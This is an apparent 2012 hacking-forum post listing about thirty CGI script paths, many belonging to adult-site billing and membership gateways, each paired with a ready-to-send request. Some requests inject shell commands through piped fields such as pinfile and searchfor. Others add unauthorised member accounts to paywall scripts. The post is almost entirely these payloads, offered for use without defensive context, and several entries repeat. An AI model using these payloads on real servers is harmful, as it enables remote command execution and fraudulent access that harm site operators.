Welcome home, veteran members of 中测联盟 (domain registered in 1997)

Cgi-bin: 30 vulnerabilities + how to use them

Posted on 2012-9-13 16:55:26
==============================

/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
post_values=username:password

/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

/af.cgi
/env.cgi
ADD+;echo;pwd;exit

/count.cgi
pinfile=|echo;pwd;exit|

/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
username=username&password=password&expire=30

==============================